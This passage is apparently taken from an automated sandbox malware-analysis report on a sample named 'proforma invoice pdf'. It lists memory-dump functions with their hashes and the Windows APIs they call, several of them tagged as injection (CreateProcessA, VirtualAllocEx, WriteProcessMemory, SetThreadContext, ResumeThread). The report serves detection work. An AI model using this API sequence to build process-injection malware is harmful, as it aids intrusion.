Instruction ID: 06ef0b2b4d92e589b790b456a450d174ba9d7d08e0c42ce68005b2d5db8afedb
Opcode Fuzzy Hash: 2b7f064845687192b10df6436ef6c5007dd6a846273e6efbb788a7803806aad0
Instruction Fuzzy Hash: 60139534A11219CFDB25DF24C898AD9B7B2FF89300F5152E9D9096B361DB71AE85CF40

Function 0534C570 Relevance: 3.2, Strings: 2, Instructions: 719COMMON

Download Yara Rule

Strings

(oq, xrefs: 0534CE03
(oq, xrefs: 0534CDF9

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: (oq$(oq
API String ID: 0-1396055846
Opcode ID: 47b843c209a4ec4dab2a9e15fcbf6d7225359924e4b0d5f693240bd202a3b52d
Instruction ID: c342eab3b3d74005c12ddd6fdb49f0e59ead050f8717e600716c7ad685152808
Opcode Fuzzy Hash: 47b843c209a4ec4dab2a9e15fcbf6d7225359924e4b0d5f693240bd202a3b52d
Instruction Fuzzy Hash: E9525E35B01219DFDB18DF69D488A6EBBF2BF88610B159169E816DB360DB70EC41CF90

Function 02C87018 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

Ppq, xrefs: 02C8728A

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: Ppq
API String ID: 0-1927884935
Opcode ID: a246d46050cf73e058844ba33d9dab10473a539b4203b453b6962cb7ffc4b560
Instruction ID: e7f976e596d0e7cf8b6458f639220d5c8dba0d4e9561de412d270ad9a36e6e3b
Opcode Fuzzy Hash: a246d46050cf73e058844ba33d9dab10473a539b4203b453b6962cb7ffc4b560
Instruction Fuzzy Hash: 36A1A274E002198FDB19DFA9D884AEDBBF2FF88300F148169E919A7354EB306946CF50

Function 02C83E0C Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

Ppq, xrefs: 02C8728A

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: Ppq
API String ID: 0-1927884935
Opcode ID: a7a7f9ebcd401632763f96bbb5f36aca117cea43ab4b62e5cce82e78d6e95d60
Instruction ID: 8e2da3281484ada2c1e389ec8a8fadf1812c72affd8b53a7f16046bb24304903
Opcode Fuzzy Hash: a7a7f9ebcd401632763f96bbb5f36aca117cea43ab4b62e5cce82e78d6e95d60
Instruction Fuzzy Hash: EAA18374E002199FDB19DFA9D884AEDBBF2FF88300F148569E919A7354EB306946CF50

Function 059283C0 Relevance: .6, Instructions: 623COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620a52f0ca35323debdb5bc8866fb3be2921d25405d6e37b4ab2aa15c5144f81
Instruction ID: 856073605d748f3c84e79c5e6918e13130dbbc0dfcc94fb310ed40646a9f252c
Opcode Fuzzy Hash: 620a52f0ca35323debdb5bc8866fb3be2921d25405d6e37b4ab2aa15c5144f81
Instruction Fuzzy Hash: 92328271E003288FDB58DFA9D4507AEBBF2BF84300F14856AD409AB359DB349D85CB91

Function 0592B47C Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e52c25096b0a65e9ca6cfd8e408085a2c15f38820c756ee4db1a8cf82e736d
Instruction ID: bc954da49ce353db5fbc47e4b11c6e6035a74a6e74aff38ac608b51436b05ab9
Opcode Fuzzy Hash: b8e52c25096b0a65e9ca6cfd8e408085a2c15f38820c756ee4db1a8cf82e736d
Instruction Fuzzy Hash: 7722FC31A106298FDB14DF69C884BADB7B6FF48304F1485A9D80AE7355EB70AE85CF50

Function 05929640 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187043dcb9708d3b60cb8c7d52f73848133404f2854da13d2fc17a467652daea
Instruction ID: ad36ef4f31cd50dd20e68b9b27b52028bf6c0b85d7dd21bc6257e9f1c286cefa
Opcode Fuzzy Hash: 187043dcb9708d3b60cb8c7d52f73848133404f2854da13d2fc17a467652daea
Instruction Fuzzy Hash: 78C15C75E002688FDF14DF65D880B9EBBF2BF88310F14C5AAD449AB259DB30A985CF50

Function 059283BC Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff973273540dc87ea23920e67239e87c1ece4f4954860dcf9864d9551d5339a
Instruction ID: 2081d13f0ce659ac208290fe228f6ea8156f5bad3541351269ef2a8bb748590d
Opcode Fuzzy Hash: 5ff973273540dc87ea23920e67239e87c1ece4f4954860dcf9864d9551d5339a
Instruction Fuzzy Hash: 3AC14C31E002689FDF15DF65C884B9EBBF2BF88310F14C5AAD449AB259DB30A985CF50

Function 07304A20 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea22266479c852b97b3bd991c795b8ebcb53d20b6a1e454646280fc5cdd82a9
Instruction ID: bf9aed478c4a4da0973e9b96975aac4bf700d62fa5053700c793bb28fee7ede1
Opcode Fuzzy Hash: eea22266479c852b97b3bd991c795b8ebcb53d20b6a1e454646280fc5cdd82a9
Instruction Fuzzy Hash: A86139B4D19249CFEB14CFE9D4506EEBBBAFF8A300F109029D519A7291DB305A56CF90

Function 07308270 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f50025184e86b25bb63f62f91809f4211f0fb54fe1ec46150b2598b76bf76c30
Instruction ID: ba421d5364f07676fb61b8610c7292fbbbd85d05a23eca09610887b3e9ca0972
Opcode Fuzzy Hash: f50025184e86b25bb63f62f91809f4211f0fb54fe1ec46150b2598b76bf76c30
Instruction Fuzzy Hash: A4315EB1D046588FEB19CF6B9C506DEBBB7BFCA200F04C0A6D44DAB261DB3509418F95

Function 0730FABE Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0730FCFE

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a994aa0cc4f0e4898026c467d6c375b553f16fac19f30857d1156334b1a8d194
Instruction ID: cde0d8f8d3231488dba235958416f4514585a061c15b92819ae62e668253eaeb
Opcode Fuzzy Hash: a994aa0cc4f0e4898026c467d6c375b553f16fac19f30857d1156334b1a8d194
Instruction Fuzzy Hash: 78A15DB1D0031ADFEB24DFA8C851BEDBBB2BF48314F148569D818A7284DB749985CF91

Function 0730FAC8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0730FCFE

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2032f598a31b0e319521ff30f8855d6064ca374cd5c88b860609cd12338385c7
Instruction ID: 4f5d7a2b72587330aa81d0850c19ff40fb7a0d8874f2991f1a95dbf35ef3f158
Opcode Fuzzy Hash: 2032f598a31b0e319521ff30f8855d6064ca374cd5c88b860609cd12338385c7
Instruction Fuzzy Hash: 9E914BB1D0031ADFEB24DFA8C851BEDBBB2BF48314F148569D818A7284DB749985CF91

Function 02C8BB40 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02C8BDA6

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 906e5c4e3302730e5c1bed0254032969844df6648f435130f943bd32b4ce466f
Instruction ID: 9646d1527dff98918c291a0c170091a37cb301b81f27c5c712ab8a04d3dde06d
Opcode Fuzzy Hash: 906e5c4e3302730e5c1bed0254032969844df6648f435130f943bd32b4ce466f
Instruction Fuzzy Hash: 61814670A00B159FDB24EF2AD04479ABBF1FF88308F00892DD58AD7A50DB75E946CB90

Function 05350A18 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053527C2

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8b9ba33a43e40f73733699a12de6df2887aebf0919f72b884c168fc2189b885d
Instruction ID: b544517443a1954c0630e1a3b9315fed9d21c47ab3a6958b7204f39fd851449a
Opcode Fuzzy Hash: 8b9ba33a43e40f73733699a12de6df2887aebf0919f72b884c168fc2189b885d
Instruction Fuzzy Hash: C251B0B5D103489FDF14CFAAC884ADEBBB5FF48310F24812AE819AB250D775A845CF94

Function 053526A4 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053527C2

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6826490d0fe5134a4416ceef8ac5fb7bae0614f8f16a7ab78ec362f88cd9e3a2
Instruction ID: aaa71b9544f9d1ac688144c333138d31c574732e5e1b90eed26254b5567d6efd
Opcode Fuzzy Hash: 6826490d0fe5134a4416ceef8ac5fb7bae0614f8f16a7ab78ec362f88cd9e3a2
Instruction Fuzzy Hash: CF51CEB5C103489FDF15CFA9C884ADEBBB6FF48310F24822AE819AB250D7749941CF90

Function 05350B6C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05354D41

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 426bc9a396ffd1e227b7b299a55f1c3072b9bbb99f7dbf7a80a7ac66de90a41c
Instruction ID: 2969814e54ec843d372eeb133626d124cb0a5df411034f97c5bbaefd19703a6a
Opcode Fuzzy Hash: 426bc9a396ffd1e227b7b299a55f1c3072b9bbb99f7dbf7a80a7ac66de90a41c
Instruction Fuzzy Hash: C2413B75A00309DFDB14CF99C448EAAFBF5FF88314F248459D919AB361D774A841CBA0

Function 02C84514 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C859C9

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 73bada635b4b0a1d37bd43d61c530a639e685eb4430769654f555527b8f65f41
Instruction ID: f92ff89b65b0d6722c0e0abfafa2074bac63306ece40b07d5bd7e3965be749b6
Opcode Fuzzy Hash: 73bada635b4b0a1d37bd43d61c530a639e685eb4430769654f555527b8f65f41
Instruction Fuzzy Hash: B741C070C00719CFEB24DFA9C884BDEBBB5BF49348F60805AD409AB251D7B56946CF90

Function 02C8590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C859C9

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7c266978249dc835d2420ec05e5dfc40f6a4dbfe2c8a85ccd4c2e19eb13e97a8
Instruction ID: fc4b15697a2e34720c3791329571319dda8c7c2400d99dd56c18f3a522c9cf26
Opcode Fuzzy Hash: 7c266978249dc835d2420ec05e5dfc40f6a4dbfe2c8a85ccd4c2e19eb13e97a8
Instruction Fuzzy Hash: B541D1B1C00719CFEB24DFA9C8847DDBBB5BF48348F60806AD409AB255DBB5694ACF50

Function 05927710 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,059276FD,?,?), ref: 059277AF

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 1883ccb8bc5b3e533099fe3ace0d5d23cdbac5ea41b4210fac61a78b90b9f00a
Instruction ID: 3851e9332fa581fbf0fe3b4bb93f51c8fb0bee32b0402fde1c4f8c513719c8f1
Opcode Fuzzy Hash: 1883ccb8bc5b3e533099fe3ace0d5d23cdbac5ea41b4210fac61a78b90b9f00a
Instruction Fuzzy Hash: 8631D1B5D002199FDB10CF99D984ADEBBF9FB48310F24842AE819A7310D375A544CFA4

Function 0592667C Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,059276FD,?,?), ref: 059277AF

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: b4a41c441aabf3f06a2596334a06ab9de0b31681c1970e125916b1dcae921a9d
Instruction ID: c8b0f8b8280cc18e6a424ac1712c99b259702751a8a8e8972abff39c4db6abfb
Opcode Fuzzy Hash: b4a41c441aabf3f06a2596334a06ab9de0b31681c1970e125916b1dcae921a9d
Instruction Fuzzy Hash: 4D31B1B5D003599FDB10CF9AD884A9EBBF9FB48310F24842AE919A7310D775A944CFA4

Function 0730F838 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0730F8D0

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 890d1ab893052fcee95320faf6c404a45fb4d26e7f72a0d49da2e8ac76496ac1
Instruction ID: 14bfdaa494e512a888819755da971eeb651f15d1b8bf71ead3aaeb3b3614b3c6
Opcode Fuzzy Hash: 890d1ab893052fcee95320faf6c404a45fb4d26e7f72a0d49da2e8ac76496ac1
Instruction Fuzzy Hash: 022137B2D003499FDB24CFA9C844BEEBBF5FF48310F14842AE958A7281C7789544CBA5

Function 0730F928 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0730F9B0

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: aa57adf1e1be91087bfe0d79b3cbb9897070255843d059bef8b709e5f74fb202
Instruction ID: c47e73c8e49be6e416fefaf7f5f4ef8c755205491dca549195c3c11653453549
Opcode Fuzzy Hash: aa57adf1e1be91087bfe0d79b3cbb9897070255843d059bef8b709e5f74fb202
Instruction Fuzzy Hash: FD2107B5C00349AFDB14CFAAC841BEEBBF5FF48310F50842AE558A7640C7399541DBA5

Function 0730F840 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0730F8D0

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1176b37f6e08a01acb63a15e79ce784438a53c434fe6388c72b43e013da993ae
Instruction ID: cfc6c79730d39455872752a7044cc5b846c9e9b995182783d7f579256d6b796f
Opcode Fuzzy Hash: 1176b37f6e08a01acb63a15e79ce784438a53c434fe6388c72b43e013da993ae
Instruction Fuzzy Hash: 962127B5D003499FDB10CFAAC885BDEBBF5FF48310F14842AE918A7240C7789940CBA5

Function 0730F6A0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0730F726

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8f62eeb8b53166c6d1a846385999f8d323019e85e938db6d8a56c4290873aef9
Instruction ID: 46c41c517b8a9b4a77857ae43155c369155dd5e1754e0189ad5095c05b5e87a2
Opcode Fuzzy Hash: 8f62eeb8b53166c6d1a846385999f8d323019e85e938db6d8a56c4290873aef9
Instruction Fuzzy Hash: 91215CB5D003099FDB20CFAAC4857EEBBF5FF48314F14842AD419A7241CB789545CBA5

Function 02C8E018 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8DFE6,?,?,?,?,?), ref: 02C8E0A7

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: baebc87d5ee34cb2faf58795b8ffbab156aa5da3a513a3bd6b996b181f3e3032
Instruction ID: f7a178cd6feb77a5ede6f63023ac9ab4fec025f2175c22d90861cf42dda805f5
Opcode Fuzzy Hash: baebc87d5ee34cb2faf58795b8ffbab156aa5da3a513a3bd6b996b181f3e3032
Instruction Fuzzy Hash: 8821F4B5900248DFDB10CFAAD584ADEBBF5EB48310F14841AE814A7350C338A944CF65

Function 02C8D6E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8DFE6,?,?,?,?,?), ref: 02C8E0A7

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 946ce900fc13901885c1a7d0783803ceedc44c4cca4e2a55fde184d6b44fc1d8
Instruction ID: 208dddb1f73831ab3f486b93097c200d61c09a79765e682e714b12fcbdd92e1c
Opcode Fuzzy Hash: 946ce900fc13901885c1a7d0783803ceedc44c4cca4e2a55fde184d6b44fc1d8
Instruction Fuzzy Hash: 7521D2B5D00248EFDB10DF9AD584AEEBBF9EB48314F14841AE914A7350D379A940CFA5

Function 0730F6A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0730F726

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2c8597c14612682693fc01ce2c40f117f39e33fb31433e304193f9c8e7f65cf3
Instruction ID: 9e5273129e6083cfaf9b2bf4ba14923c2d412f01622c33f49e1c903302f0a34a
Opcode Fuzzy Hash: 2c8597c14612682693fc01ce2c40f117f39e33fb31433e304193f9c8e7f65cf3
Instruction Fuzzy Hash: 352168B1D003098FEB20CFAAC4847EEBBF4EF48310F14842AD418A7280CB789944CFA5

Function 0730F930 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0730F9B0

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8ea5cf72ecc072cf8f895439fb819e9257738543e77dab7117d480fccffba4fc
Instruction ID: 3886e0d32da22379916557a73de9a07f7221b529c22a30d8dbb455495b7d7d1f
Opcode Fuzzy Hash: 8ea5cf72ecc072cf8f895439fb819e9257738543e77dab7117d480fccffba4fc
Instruction Fuzzy Hash: 472114B1C003499FDB10CFAAC880BEEBBF5FF48310F10842AE958A7240C7399940CBA5

Function 02C8BDD8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02C8BDA6

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 10db5ac35a6f166fd4fce6e676dec31f6bfb53343c7590fcdffd0cb465a69cda
Instruction ID: cd3913dc99a7953ceccad03212819c8333bd7e7ff9c531375f0ed8c70f3d918e
Opcode Fuzzy Hash: 10db5ac35a6f166fd4fce6e676dec31f6bfb53343c7590fcdffd0cb465a69cda
Instruction Fuzzy Hash: D411E9726002549FEB14EB6AE8047ABBBF5EFC431CF04C42AD544E7251D7359C05CBA0

Function 0730F1B8 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0730F222

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 51fe25c78a82daecdf332684eacd571ecabaeb01874b854e35ea67a45c697eed
Instruction ID: ea887e113c920c4140a5640dbcf71ddf4c463c3ee3b24d4e19c2867bb92a5962
Opcode Fuzzy Hash: 51fe25c78a82daecdf332684eacd571ecabaeb01874b854e35ea67a45c697eed
Instruction Fuzzy Hash: ED118BB5D003489FEB20DFAAD8457EEFBF9EF48224F24841AD419A7640CB399540CBA5

Function 0730F77A Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0730F7EE

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4e55dd1bead33c46f18a49a439a1ab73151e56e8000ef439435ba395c1d924d0
Instruction ID: 9294ac55f559855483336a30bc9154460dce64de6e18ba86c1d4e5a2b599cd78
Opcode Fuzzy Hash: 4e55dd1bead33c46f18a49a439a1ab73151e56e8000ef439435ba395c1d924d0
Instruction Fuzzy Hash: 531117769003499FDB24DFAAC844BEEBBF5EF88320F24841AE519A7250C7359540CBA5

Function 0730F780 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0730F7EE

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c4963852f210aa12b4d29767967e56359323c0f31dd0bc71e6f09ccfe8f70ec6
Instruction ID: 3634559cc899f9e5cedc1116b2baa38ce084da0363a20f9f01e5b1460e4656a0
Opcode Fuzzy Hash: c4963852f210aa12b4d29767967e56359323c0f31dd0bc71e6f09ccfe8f70ec6
Instruction Fuzzy Hash: 8B113776C003499FDB24DFAAC844BDEBBF5EF48320F248419E519A7250CB799540CFA5

Function 0730F1C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0730F222

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d302a9531660d607ab846cf0baa332b66d2bd4828cb488651486434b50cefc7f
Instruction ID: 0886cdd0dd52ec711bba1dc9496da886f652000a4dfc484cff3619ca4fb589da
Opcode Fuzzy Hash: d302a9531660d607ab846cf0baa332b66d2bd4828cb488651486434b50cefc7f
Instruction Fuzzy Hash: 8D113AB5D003498FDB24DFAAC4457DEFBF9EF48310F248419D519A7240CB79A540CB95

Function 02C8BD40 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

